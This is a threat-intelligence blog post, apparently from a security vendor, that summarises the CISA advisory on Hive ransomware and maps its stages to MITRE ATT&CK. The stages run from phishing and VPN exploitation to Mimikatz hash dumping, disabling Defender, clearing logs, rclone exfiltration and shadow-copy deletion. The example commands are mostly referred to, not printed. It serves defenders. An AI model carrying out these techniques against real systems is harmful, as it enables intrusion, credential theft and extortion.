CISA Alert AA22-321A: Hive Ransomware Analysis, Simulation, TTPs & IOCs

On November 17, 2022, CISA and FBI released a joint advisory on Hive ransomware [1]. Hive ransomware group follows the Ransomware-as-a-Service model (RaaS) and targets a wide range of businesses and critical infrastructure sectors such as telecommunications, manufacturing, IT, and the healthcare sector. 

Picus Threat Library already had attack simulations for earlier variants of Hive ransomware. Picus Labs swiftly added attack simulations for the newer variants of Hive ransomware to Picus Threat Library.

Start your 14-day free trial: Test your security against Hive Ransomware!

Hive Ransomware Group

According to the FBI, as of November 2022, Hive ransomware has victimized more than 1300 companies, resulting in a loss of $100 million US dollars as a ransom payment. Hive ransomware follows the Ransomware-as-a-Service model (RaaS), enabling its affiliates to utilize the ransomware as they wish. Developers of the Hive ransomware continuously create, maintain and update their malware and add new defense evasion functionalities, such as evading anti-malware protections.

The victim statistics show that threat actors leveraging the Hive ransomware target a wide range of businesses and critical infrastructure sectors such as telecommunications, manufacturing, information technology, and healthcare. 

Hive Ransomware Analysis and MITRE ATT&CK TTPs

Tactic: Initial Access

The way Hive actors get their initial foothold on their target's system differs depending on the threat actors using the RaaS. For instance, in some scenarios, threat actors leveraged external-facing remote services such as Remote Desktop Connection (RDP), Virtual Private Networks (VPNs), and other remote network connection protocols (ATT&CK T1133). In other cases, they bypassed the Multi-Factor Authentication (MFA) and gained access to FortiOS servers by exploiting an improper authentication vulnerability (CVE-2020-12812) in SSL VPN in FortiOS, enabling threat actors to log in without providing a second authentication factor, FortiToken.

Another initial access method that Hive threat actors use is sending phishing emails with malicious attachments that exploit ProxyShell vulnerabilities. (ATT&CK T1190). 

Further analysis shows that Hive actors manage to deploy a webshell on the compromised Windows Exchange Server. 

Figure 1:  Deploying a webshell on the compromised Windows Exchange Server [1]

Windows released patches for these three vulnerabilities in April and May 2021 as part of their "Patch Tuesday" releases.

Tactic: Execution 

After establishing initial access to the compromised Windows Exchange Server, the Hive ransomware group executes some PowerShell commands to download malicious binaries from their Command and Control (C2) server (ATT&CK T1059). Adversaries download malware directly to the compromised host's memory and execute them using PowerShell's Invoke-Expression (IEX) cmdlet.

Example 1: Downloading and executing malware using the Invoke-Expression cmdlet 

In addition, Hive actors download and execute an additional obfuscated PowerShell script, which was later analyzed as a part of the Cobalt Strike framework. VirusTotal shows that the malicious file gets flagged by 41 out of 69 detections.

Figure 2: VirusTotal result of the malicious file downloaded by Hive ransomware group

Tactic: Persistence 

Adversaries establish persistence by creating a new user called "user" and add this new user to both the "Remote Desktop User" and "Administrators" groups (ATT&CK T1136). This action also gives this new user NT AUTHORITY\SYSTEM privileges. Later, adversaries used this account to access the critical files containing valid user credentials, RDP access to backup servers, etc. 

Tactic: Credential Access 

Next, Hive actors use Mimikatz's sekurlsa::logonpasswords module to dump NTLM hashes (ATT&CK T1003) of all the accounts currently logged into the system and use the Administrator's NTLM hash to perform a Pass-the-Hash (PtH) attack.

Figure 3: Pass-the-Hash Attack [1]

Tactic: Lateral Movement

Using the stolen user credentials, adversaries leverage the "mstsc.exe /v:target_computer_name" command to send RDP requests (ATT&CK T1021.001) to many devices within the same network with the attackers to make sure that attackers have access to the critical databases to deploy ransomware, and therefore to gain higher impact.

Tactic: Discovery

Hive actors list all the domain joint assets into a file called domains.txt using the  SoftPerfect tool. Then, they execute a batch script called p.bat to test if the discovered assets are alive.

Example 2: Command in the p.bat script

Tactic: Defense Evasion

Hive ransomware group distributes a file with a benign-looking name, "windows.exe" to compromised hosts in their victim's network. In reality, this file is the ransomware payload written in the Go language. "windows.exe" payload uses several defense evasion techniques.

• Impair Defenses: Disable or Modify Tools (ATT&CK 1562.001)

Example 3: Stopping Security Accounts Manager to prevent alarming SIEM systems

• Modify Registry (ATT&CK T1112)

Example 4: Disabling Windows Defender via Registry Tool

• Indicator Removal (ATT&CK T1070)

Example 5: Clearing Windows Security Event Logs

Tactic: Exfiltration 

Prior to the encryption process, the Hive ransomware group exfiltrates sensitive data from the victim host by leveraging a combination of rclone and the cloud storage service Mega.nz (ATT&CK T1537).

Tactic: Impact

Example 6: Deleting volume shadow copies to inhibit system recovery (ATT&CK T1490)

Upon executing the commands above, the encryption process starts. During the encryption, ransomware drops a key file (*.key) required for decryption on the root directory of the target system [2]. Then the ransom note file is created, HOW_TO_DECRYPT.txt, stating that the key file is required for decryption and any attempt to modify, rename or delete this key file will turn the recovery phase into a dead-end (ATT&CK T1486). 

Figure 3: Hive ransom note [1]

Like other ransomware groups that use the double-extortion model, Hive ransomware leaks sensitive information on their website called "HiveLeaks" if their victims do not pay the ransom.

How Picus Helps Simulate Hive Ransomware Attacks?

Picus Threat Library already had threats for the Hive ransomware used in the earlier attack campaigns. Picus Labs added attack simulations for the latest variant of Hive ransomware. We strongly suggest simulating Hive ransomware attacks to test the effectiveness of your security controls against ransomware attacks using the Picus Complete Security Validation Platform. You can test your defenses against Hive ransomware and many other ransomware families within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Hive ransomware: 

Indicators of Compromises (IOCs)

References

[1] N. Ovadia, "Hive Ransomware Analysis," Apr. 19, 2022. https://www.varonis.com/blog/hive-ransomware-analysis. [Accessed: Dec. 08, 2022]

[2] "#StopRansomware: Hive Ransomware." https://www.cisa.gov/uscert/ncas/alerts/aa22-321a. [Accessed: Dec. 08, 2022]